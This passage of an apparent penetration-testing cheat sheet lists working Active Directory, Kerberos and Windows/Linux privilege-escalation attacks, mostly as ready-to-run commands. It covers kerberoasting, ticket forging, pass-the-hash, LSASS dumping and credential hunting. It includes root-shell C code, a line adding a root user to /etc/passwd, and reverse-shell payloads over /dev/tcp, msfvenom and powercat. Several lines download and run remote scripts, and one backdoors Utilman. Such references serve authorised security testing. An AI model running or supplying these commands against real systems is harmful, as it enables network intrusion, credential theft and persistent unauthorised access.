• The user does not authenticate with Kerberos to the constrained service.

• Instead of authenticating to the KDC first, like in a regular Kerberos ticket request, the user authenticates directly to the service.

• Once the user authenticates to the service, the service then requests a forwardable TGT to the KDC without the user's password included.

• The KDC checks the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION attribute on the service and whether or not the user's account is blocked.

• If everything checks out a ticket is returned.

• Ticket gets passed back to the KDC and a TGS ticket is requested to the second service.

• KDC checks the msDS-AllowedToDelegateTo field on the second service and if it is listed, then an access ticket is granted.

• TGS gets sent to the next service and the user now can authenticate to it.

The Service for User (S4U) extension is used to aid the impersonation process when Constrained Delegation is used. The extension has two extensions within it:

• Service for User to Self (S4U2Self): This allows a service to obtain a forwardable TGS to itself on the user's behalf with the User Principal Name supplied. No password is included.

• Service for User to Proxy (S4U2proxy): This allows the service to obtain the required TGS on the user's behalf to the second service the user needs to connect to. This second service will have the msDS-AllowedToDelegateTo attribute given to it. User tokens can be forwarded to those SPN's which have this attribute given.

Delegation occurs not only for the specified service, but also for ANY service running under the account that is running the service.

Unconstrained Delegation

https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/privilege-escalation/unconstrained-delegation

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation

Kerberos Delegation allows for users to access resources on another server via a service that the user has access to. The service the user is connected to impersonates that user by resusing his credentials which then allows the user to gain access to that server.

• When Unconstrained Delegation is enabled, the user's TGT is sent along with the TGS to the first hop service. That TGT gets stored in the server's LSASS which allows the service to take it out and delegate with it if necessary.

• Accounts or services with Unconstrained Delegation can be escalated to an account with higher privileges, if a Domain Admin or a higher privileged user connecting to that machine.

• The TGT can be extracted and the ticket reused.

Resource-based Constrained Delegation (RBCD)

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution

https://blog.netwrix.com/2022/09/29/resource-based-constrained-delegation-abuse/

https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-constrained-delegation-overview

• In unconstrained and constrained Kerberos delegation, a computer/user is told what resources it can delegate authentications to.

• In Resource-based Kerberos Delegation, computers (resources) specify who they trust and who can delegate authentications to them.

• By supporting constrained delegation across domains, services can be configured to use constrained delegation to authenticate to servers in other domains rather than using unconstrained delegation.

• This provides authentication support for across domain service solutions by using an existing Kerberos infrastructure without needing to trust front-end services to delegate to any service.

Prerequisites

• Populate the msDS-AllowedToActOnBehalfOfOtherIdentity attribute with a computer account that will be controlled.

• Know a SPN set on the object to gain access.

• Create a new computer account using PowerMad (allowed due to the default MachineAccountQuota value).

• Leverage Rubeus to abuse Resource-Based Constrained Delegation.

Kerberoasting

https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/privilege-escalation/kerberoasting

https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/post-compromise-attacks/kerberoasting

• All user accounts that have Service Principal Names (SPN's) set can be kerberoasted.

• Relatively silent technique because it leaves only one 4769 ID event on the log.

AS-REP Roasting

https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/privilege-escalation/as-rep-roasting

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat

ASPREPRoast is about retrieving crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. This isn't as useful as Kerberoasting, as accounts have to have DONT_REQ_PREAUTH explicitly set for them to be vulnerable and you are still reliant upon weak password complexity for the attack to work.

• AS-REP roasting is a technique that allows retrieving password hashes for users that have Do not require Kerberos preauthentication property selected.

• Those hashes can then be cracked offline.

Silver, Golden and Diamond Tickets

• Silver Ticket is a forged service authentication ticket (Service Principal Name (SPN) and Machine Account Keys (Hash in RC4 or AES) needed). Silver Tickets do not touch the Domain Controller (DC).

• Golden Ticket is a Ticket Granting Ticket (TGT) and completely forged offline (KRBTGT Account Hash needed).

• Diamond Ticket is essentially a Golden Ticket but requested from a Domain Controller (DC).

Attacking Kerberos

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

Bruteforce

$ ./kerbrute -domain <DOMAIN> -users <FILE> -passwords <FILE> -outputfile <FILE>

With List of Users

C:\> .\Rubeus.exe brute /users:<FILE> /passwords:<FILE> /domain:<DOMAIN> /outfile:<FILE>

Check Passwords for all Users in Domain

C:\> .\Rubeus.exe brute /passwords:<FILE> /outfile:<FILE>

ASPREPRoast

Check ASPREPRoast for all Domain Users (Credentials required)

$ impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format hashcat -outputfile <FILE>
$ impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format john -outputfile <FILE>

Check ASPREPRoast for a List of Users (No Credentials required)

$ impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format hashcat -outputfile <FILE>
$ impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format john -outputfile <FILE>

Check ASPREPRoast for all Domain Users in Domain

C:\> .\Rubeus.exe asreproast  /format:hashcat /outfile:<FILE>

Kerberoasting

$ python GetUserSPNs.py <DOMAIN>/<USERNAME>:<PASSWORD> -outputfile <FILE>
C:\> .\Rubeus.exe kerberoast /outfile:<FILE>
PS C:\> iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
PS C:\> Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII <FILE>
PS C:\> Invoke-Kerberoast -OutputFormat john | % { $_.Hash } | Out-File -Encoding ASCII <FILE>

Overpass The Hash/Pass The Key (PTK)

Request TGT with Hash

$ impacket-getTGT <DOMAIN>/<USERNAME> -hashes <LMHASH>:<NTLMHASH>

Request TGT with aesKey (More secure Encryption, probably more stealth due is it used by Default)

$ impacket-getTGT <DOMAIN>/<USERNAME> -aesKey <KEY>

Request TGT with Password

$ impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD>

Set TGT for Impacket Usage

$ export KRB5CCNAME=<USERNAME>.ccache

Execute Remote Commands

$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass

Ask and inject the Ticket

C:\> .\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USERNAME> /rc4:<NTLMHASH> /ptt

Execute a CMD on Remote Host

C:\> .\PsExec.exe -accepteula \\<RHOST> cmd

Pass The Ticket (PTT)

Harvest Tickets from Linux

Check Type and Location of Tickets

$ grep default_ccache_name /etc/krb5.conf

• If none return, default is FILE:/tmp/krb5cc_%{uid}

• In Case of File Tickets it is possible to Copy-Paste them to use them

• In Case of being KEYRING Tickets, the Tool tickey can be used to get them

• To dump User Tickets, if root, it is recommended to dump them all by injecting in other user processes

• To inject, the Ticket have to be copied in a reachable Folder by all Users

$ cp tickey /tmp/tickey
$ /tmp/tickey -i

Harvest Tickets from Windows

mimikatz # sekurlsa::tickets /export
$ .\Rubeus dump

Convert Tickets dumped with Rubeus into base64

[IO.File]::WriteAllBytes("<TICKET>.kirbi", [Convert]::FromBase64String("<TICKET>"))

Convert Tickets between Linux and Windows Format with ticket_converter.py

https://github.com/Zer1t0/ticket_converter

$ python ticket_converter.py ticket.kirbi ticket.ccache
$ python ticket_converter.py ticket.ccache ticket.kirbi

Using Ticket on Linux

$ export KRB5CCNAME=<USERNAME>.ccache

Execute Remote Commands by using TGT

$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass

Using Ticket on Windows

Inject Ticket with mimikatz

mimikatz # kerberos::ptt <KIRBI_FILE>

Inject Ticket with Rubeus

C:\> .\Rubeus.exe ptt /ticket:<KIRBI_FILE>

Execute a CMD on Remote Host

C:\> .\PsExec.exe -accepteula \\<RHOST> cmd

Silver Ticket

Impacket Examples

Generate TGS with NTLM

$ python ticketer.py -nthash <NTLMHASH> -domain-sid <SID> -domain <DOMAIN> -spn <SPN>  <USERNAME>

Generate TGS with aesKey

$ python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN> -spn <SPN>  <USERNAME>

Set the ticket for impacket use

$ export KRB5CCNAME=<USERNAME>.ccache

Execute Remote Commands by using TGT

$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass

mimikatz Examples

Generate TGS with NTLM

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<NTLMHASH> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>

Generate TGS with AES 128bit Key

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>

Generate TGS with AES 256bit Key (More secure Encryption, probably more stealth due is it used by Default)

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>

Inject TGS with Mimikatz

$ mimikatz # kerberos::ptt <KIRBI_FILE>

##3## Rubeus Examples

C:\> .\Rubeus.exe ptt /ticket:<KIRBI_FILE>

Execute CMD on Remote Host

C:\> .\PsExec.exe -accepteula \\<RHOST> cmd

Golden Ticket

Impacket Examples

Generate TGT with NTLM

$ python ticketer.py -nthash <KRBTGT_NTLM_HASH> -domain-sid <SID> -domain <DOMAIN>  <USERNAME>

Generate TGT with aesKey

$ python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN>  <USERNAME>

Set TGT for Impacket Usage

$ export KRB5CCNAME=<USERNAME>.ccache

Execute Remote Commands by using TGT

$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass

mimikatz Examples

Generate TGT with NTLM

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<KRBTGT_NTLM_HASH> /user:<USERNAME>

Generate TGT with AES 128bit Key

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME>

Generate TGT with AES 256bit Key (More secure Encryption, probably more stealth due is it used by Default)

mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME>

Inject TGT with Mimikatz

mimikatz # kerberos::ptt <KIRBI_FILE>

Rubeus Examples

Inject Ticket with Rubeus

C:\> .\Rubeus.exe ptt /ticket:<KIRBI_FILE>

Execute CMD on Remote Host

C:\> .\PsExec.exe -accepteula \\<RHOST> cmd

Get NTLM from Password

$ python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).digest())'

Krbrelayx

https://github.com/dirkjanm/krbrelayx

Abuse DNS Delegation Zones with dnstool.py

$ python3 dnstool.py -u 'domain\<USERNAME>' -p '<PASSWORD>' -a add -r '<TO_ABUSE>.<DOMAIN>' -d <LHOST> <RHOST>

LAPS

PS C:\Users\<USERNAME>\Documents> $Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime
PS C:\Users\<USERNAME>\Documents> $Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-Adm-PwdExpirationTime

LDAP

https://github.com/infosecn1nja/AD-Attack-Defense

https://www.poweradmin.com/blog/restoring-deleted-objects-from-active-directory-using-ad-recycle-bin/

https://adsecurity.org/?p=2288

Queries

$ (New-Object adsisearcher((New-Object adsi("LDAP://dc.<DOMAIN>.local","<DOMAIN>\<USERNAME>","<PASSWORD>")),"(objectCategory=Computer)")).FindAll() | %{ $_.Properties.name }
$ (New-Object adsisearcher((New-Object adsi("LDAP://dc.<DOMAIN>.local","<DOMAIN>\<USERNAME>","<PASSWORD>")),"(info=*)")).FindAll() | %{ $_.Properties }

ldapsearch

$ ldapsearch -x -h <RHOST> -s base namingcontexts
$ ldapsearch -D <USERNAME> -H ldap://<RHOST> -w "<PASSWORD>" -b "CN=Users,DC=contoso,DC=local" | grep info
$ ldapsearch -x -b "dc=<DOMAIN>,dc=local" "*" -h <RHOST> | awk '/dn: / {print $2}'
$ ldapsearch -x -D "cn=admin,dc=<DOMAIN>,dc=local" -s sub "cn=*" -h <RHOST> | awk '/uid: /{print $2}' | nl
$ ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
$ ldapsearch -x -h <RHOST> -D "<USERNAME>"  -b "dc=<DOMAIN>,dc=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
$ ldapsearch -x -w <PASSWORD>
$ ldapsearch -H ldap://<DOMAIN> -b "DC=<DOMAIN>,DC=local" > <FILE>.txt

LD_PRELOAD

https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/

shell.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
	unsetenv("LD_PRELOAD");
	setresuid(0,0,0);
	system("/bin/bash -p");
}

or

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

Compiling

$ gcc -o <SHARED_OBJECT>.so <FILE>.c -shared -FPIC -nostartfiles 

Privilege Escalation

$ sudo LD_PRELOAD=/PATH/TO/SHARED_OBJECT/<SHARED_OBJECT>.so <BINARY>

LD_LIBRARY_PATH

Get Information about Libraries

$ ldd /PATH/TO/BINARY/<BINARY>

shell.c

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
	unsetenv("LD_LIBRARY_PATH");
	setresuid(0,0,0);
	system("/bin/bash -p");
}

Compiling

$ gcc -o <LIBRARY>.so.<NUMBER> -shared -fPIC <FILE>.c

Privilege Escalation

$ sudo LD_LIBRARY_PATH=/PATH/TO/LIBRARY/<LIBRARY>.so.<NUMBER> <BINARY>

Linux

adduser.sh

#!/bin/bash
echo '<USERNAME>:BP9vDdYHNP.Mk:0:0:root:/root:/bin/bash' >> /etc/passwd

capsh

$ capsh --print

Linux Wildcards

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

With the command touch -- --checkpoint=1 will be a file created. Why? Because the -- behind the command touch is telling touch, that there's option to be wait for. Instead of an option, it creates a file, named --checkpoint=1.

$ touch -- --checkpoint=1

or

$ touch ./--checkpoint=1

So after creating the --checkpoint=1 file, i created another file, which executes a shell script.

$ touch -- '--checkpoint-action=exec=sh shell.sh'

or

$ touch ./--checkpoint-action=exec=<FILE>

To delete a misconfigured file, put a ./ in front of it.

$ rm ./'--checkpoint-action=exec=python script.sh'

logrotten

https://github.com/whotwagner/logrotten

Skeleton Payload

if [ `id -u` -eq 0 ]; then ( /bin/sh -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 ); fi

Syntax

If "create"-option is set in logrotate.cfg

$ ./logrotten -p ./payloadfile /tmp/log/pwnme.log

If "compress"-option is set in logrotate.cfg

$ ./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log

Lsass

Dump

C:\> tasklist
C:\> rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 688 C:\Users\Administrator\Documents\lsass.dmp full

Lua

Code Execution

file = io.open("/root/.ssh/authorized_keys", "w")
file:write("ssh-rsa AAAAB3N--- snip ---YM5syQ==")
file:close()

machinectl

$ machinectl shell --uid=root

Microsoft Windows

Common Commands

C:\> tasklist /SVC
C:\> sc query
C:\> sc qc <SERVICE>
C:\> netsh firewall show state
C:\> schtasks /query /fo LIST /v
C:\> findstr /si password *.xml *.ini *.txt
C:\> dir /s *pass* == *cred* == *vnc* == *.config*
C:\> accesschk.exe -uws "Everyone" "C:\Program Files"
C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn
C:\> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Adding Users to Groups

C:\> net user <USERNAME> <PASSWORD> /add /domain
C:\> net group "Exchange Windows Permissions" /add <USERNAME>
C:\> net localgroup "Remote Management Users" /add <USERNAME>

Enable Remote Desktop (RDP)

C:\> reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\> netsh advfirewall firewall set rule group="remote desktop" new enable=yes

or

PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0;
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1;
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop";

Hashes

https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

• LM Hashes are deprecated and so there are replaced by an empty string (aad3b435b51404eeaad3b435b51404ee).

• If a Hash starts with 31d6, chances are pretty good, that there is no Password set for the user.

LM

• Oldest password storage used by Microsoft Windows

• If available, they can be obtained from SAM databases on a Microsoft Windows system or from the NTDS database of a Domain Controller

• When dumping SAM/NTDS databases, they are shown together within the NTHash before the colon

• Can be used for Pass-The-Hash

Example

299BD128C1101FD6

Algorithm

1. Convert all lower case to upper case

2. Pad password to 14 characters with NULL characters

3. Split the password to two 7 character chunks

4. Create two DES keys from each 7 character chunk

5. DES encrypt the string "KGS!@#$%" with these two chunks

6. Concatenate the two DES encrypted strings. This is the LM hash.

Cracking

$ john --format=lm <FILE>
$ hashcat -m 3000 -a 3 <FILE>

NTHash (NTLM)

• The way how passwords are stored on modern Microsoft Windows systems

• Can be optained by dumping the SAM database or using mimikatz

• They are also stored in the NTDS file on Domain Cotnrollers

• Can be used for Pass-The-Hash

Example

B4B9B02E6F09A9BD760F388B67351E2B

Algorithm

MD4(UTF-16-LE(password))

Cracking

$ john --format=nt <FILE>
$ hashcat -m 1000 -a 3 <FILE>

Net-NTLMv1 (NTLMv1)

• NTLM protocol uses the NTHash in Challenge-Response between a server and a client

• The v1 of the protocol uses both, the NT hash and the LM hash, depending on configuration and what is available.

• Can be obtained by using Responder

• Values for cracking are K1, K2 or K3 from the algorithm

• Version 1 is deprecated but still used in some old systems on the network

• Can be used for Relaying

Example

u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c

Algorithm

C = 8-byte server challenge, random
K1 | K2 | K3 = LM/NT-hash | 5-bytes-0
response = DES(K1,C) | DES(K2,C) | DES(K3,C)

Cracking

$ john --format=netntlm <FILE>
$ hashcat -m 5500 -a 3 <FILE>

Net-NTLMv2 (NTLMv2)

• New and improved version of the NTLM protocol

• Harder to crack

• Same concept as NTLMv1, only with a different algorithm and response sent to the server

• Can also be captured by using Responder

• Default in Microsoft Windows since Microsoft Windows 2000

• Can be used for Relaying

Example

admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030

Algorithm

SC = 8-byte server challenge, random
CC = 8-byte client challenge, random
CC* = (X, time, CC2, domain name)
v2-Hash = HMAC-MD5(NT-Hash, user name, domain name)
LMv2 = HMAC-MD5(v2-Hash, SC, CC)
NTv2 = HMAC-MD5(v2-Hash, SC, CC*)
response = LMv2 | CC | NTv2 | CC*

Cracking

$ john --format=netntlmv2 <FILE>
$ hashcat -m 5600 -a 3 <FILE>

Privileges and Permissions

AlwaysInstallElevated

C:\> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
C:\> reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

$ msfvenom -p windows/meterpreter/reverse_tcp lhost=<LHOST> lport=<LPORT> –f  msi > <FILE>.msi

C:\> msiexec /quiet /qn /i <FILE>.msi

Registry Handling

Enable Colored Output

C:\> reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Then open a new Terminal Window.

Check for Auto Run Programs

C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Get Registry Key Information

C:\> req query <REGISTRY_KEY>

Modify Registry Key

C:\> reg add <REGISTRY_KEY> /v <VALUE_TO_MODIFY> /t REG_EXPAND_SZ /d C:\PATH\TO\FILE\<FILE>.exe /f

Search the Registry for Passwords

C:\> req query HKLM /f password /t REG_SZ /s
C:\> req query HKCU /f password /t REG_SZ /s

Searching for Credentials

Unattended Windows Installations

Potential Files containing Passwords

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Search for Passwords

C:\> dir .s *pass* == *.config
C:\> findstr /si password *.xml *.ini *.txt

PowerShell History

C:\> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

C:\> cmdkey /list
C:\> runas /savecred /user:<USERNAME> cmd.exe

IIS Configuration

C:\> type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

PuTTY

C:\> reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s

Service Handling

C:\> sc.exe create <SERVICE_NAME>
C:\> sc start <SERVICE_NAME>
C:\> sc qc <SERVICE_NAME>

Tasks & Services

Scheduled Tasks

C:\> schtasks
C:\> schtasks /query /tn <TASK> /fo list /v
C:\> schtasks /run /tn <TASK>
PS C:\> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

Unquoted Service Paths

Search for Unquoted Service Paths by using sc qc.

C:\> sc qc
C:\> sc qc WindowsScheduler
C:\> sc stop WindowsScheduler
C:\> sc start WindowsScheduler

C:\> icacls <PROGRAM>.exe
C:\> icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe
C:\> icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe /grant Everyone:F

Insecure Service Permissions

C:\> accesschk64.exe -qlc <SERVICE>
C:\> icacls C:\Users\<USERNAME>\<FILE>.exe /grant Everyone:F
C:\> sc config <SERVICE> binPath= "C:\Users\<USERNAME>\<FILE>.exe" obj= LocalSystem
C:\> sc stop <SERVICE>
C:\> sc start <SERVICE>

SeBackup and SeRestore Privilege

Backup SAM and SYSTEM Hashes

C:\> reg save hklm\system C:\Users\<USERNAME>\system.hive
C:\> reg save hklm\sam C:\Users\<USERNAME>\sam.hive

Dumping Hashes

$ secretsdump.py -sam sam.hive -system system.hive LOCAL

Pass the Hash

$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@<RHOST>

SeTakeOwnership Privilege

C:\> takeown /f C:\Windows\System32\Utilman.exe

C:\> icacls C:\Windows\System32\Utilman.exe /grant Everyone:F

C:\Windows\System32\> copy cmd.exe utilman.exe

Click the Ease of Access button on the logon screen to get a shell with NT Authority\System privileges.

SeImpersonate and SeAssignPrimaryToken Privilege

https://github.com/antonioCoco/RogueWinRM

C:\> .\RogueWinRM.exe -p "C:\> .\nc64.exe" -a "-e cmd.exe <LHOST> <LPORT>"

WMIC

C:\> wmic product get name,version,vendor

Microsoft Windows Defender

Check Whitelisted Paths

PS C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"

Malicious Test String

PS C:\> $str = 'amsiinitfailed'

Minimalistic Offensive Security Tools

https://github.com/InfosecMatter/Minimalistic-offensive-security-tools

port-scan-tcp.ps1

PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<RHOST>/port-scan-tcp.ps1')

PassTheCert

https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html

https://github.com/AlmondOffSec/PassTheCert/tree/main/Python

$ certipy-ad cert -pfx <CERTIFICATE>.pfx -nokey -out <CERTIFICATE>.crt
$ certipy-ad cert -pfx <CERTIFICATE>.pfx -nocert -out <CERTIFICATE>.key
$ python3 passthecert.py -domain '<DOMAIN>' -dc-host '<DOMAIN>' -action 'modify_user' -target '<USERNAME>' -new-pass '<PASSWORD>' -crt ./<CERTIFICATE>.crt -key ./<CERTIFICATE>.key
$ evil-winrm -i '<RHOST>' -u '<USERNAME>' -p '<PASSWORD>'

Path Variable Hijacking

Finding accessible SUID Files

$ find / -perm -u=s -type f 2>/dev/null

Find writeable Paths

$ find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

Add current Directory

$ export PATH=$(pwd):$PATH

Binary File

$ cd /tmp
$ vi <FILE>
$ chmod +x ./<FILE>
$ PATH=$(pwd):$PATH <SUID_FILE>

pika

Remote Code Execution (RCE)

#!/usr/bin/env python

import pika

credentials = pika.PlainCredentials('<USERNAME>', '<PASSWORD>')
parameters = pika.ConnectionParameters('<LHOST>',5672,'/',credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.basic_publish(exchange='', routing_key='plugin_data', body='http://127.0.0.1:9001/<SCRIPT>')
connection.close()

Ping Sweep

On a Linux Operating System

$ for ip in {1..254}; do (ping -c 1 <XXX.XXX.XXX>.${ip} | grep "bytes from" | grep -v "Unreachable" &); done;

On a Windows Operating System

PS C:\> 1..255 | ForEach-Object { $ip = "<XXX.XXX.XXX>.$_"; if (Test-Connection -ComputerName $ip -Count 1 -Quiet) { $ip } }

With Meterpreter

meterpreter > (for /L %a IN (1,1,254) DO ping /n 1 /w 1 <XXX.XXX.XXX>.%a) | find "Reply"

PKINITtools

$ python3 gettgtpkinit.py -cert-pfx <USERNAME>.pfx -dc-ip <RHOST> <DOMAIN>/<USERNAME> <USERNAME>.ccache
$ export KRB5CCNAME=<USERNAME>.ccache
$ python3 getnthash.py <DOMAIN>/<USERNAME> -key 6617cde50b7ee63faeb6790e84981c746efa66f68a1cc3a394bbd27dceaf0554

plotting

Exploit race condition on linux by swapping file paths between 2 files very quickly (normal file, symlink to root owned file, swap, swap ,swap).

#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>

int main(int argc, char *argv[]) {
  while (1) {
    syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);
  }
  return 0;
}

Port Scanning

On a Linux Operating System

$ nc -zv 127.0.0.1 1-65535 | grep succeeded

$ for port in {1..65535}; do echo > /dev/tcp/<RHOST>/$port && echo "$port open"; done 2>/dev/null

On a Windows Operating System

PS C:\> 1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<RHOST>",$_)) "$_ port open"} 2>$null

PoshADCS

https://github.com/cfalta/PoshADCS/blob/master/ADCS.ps1

PS C:\> curl http://<LHOST>/ADCS.ps1 | iex
PS C:\> Get-SmartCardCertificate -Identity Administrator -TemplateName Web -NoSmartCard -Verbose
PS C:\> gci cert:\currentuser\my -recurse

powercat

https://github.com/besimorhino/powercat

PS C:\> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1');powercat -c <LHOST> -p <LPORT> -e cmd"

File Transfer

$ impacket-smbserver local . -smb2support

PS C:\> Import-Module .\powercat.ps1
PS C:\> powercat -c <LHOST> -p 445 -i C:\PATH\TO\FILE\<FILE>

Powermad

PS C:\> Import-Module ./Powermad.ps1
PS C:\> $secureString = convertto-securestring "<PASSWORD>" -asplaintext -force
PS C:\> New-MachineAccount -MachineAccount <NAME> -Domain <DOMAIN> -DomainController <DOMAIN> -Password $secureString

PowerShell Constrained Language Mode (CLM)

PS C:\> Get-ApplockerPolicy -Effective -xml
PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Bypass Test

PS C:\> $a = Get-ApplockerPolicy -effective
PS C:\> $a.rulecollections

Bypass

PS C:\> $ExecutionContext.SessionState.LanguageMode
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<RHOST>/<FILE>.ps1')

PS C:\> powershell -version 2

Example

PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<RHOST>/Invoke-Rubeus.ps1'); Invoke-Rubeus.ps1

PowerSploit

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

Import

PS C:\> Import-Module .\PowerView.ps1

or

PS C:\> iex(new-object net.webclient).downloadstring('http://<LHOST>/PowerView.ps1')

Set Credentials

PS C:\> $SecPass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force 
PS C:\> $cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\LDAP', $SecPass)

Example

PS C:\> Get-DomainUser -Credential $cred -DomainController dc.<DOMAIN>

PowerView

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

PS C:\> curl http://<LHOST>/PowerView.ps1 | iex

PRET

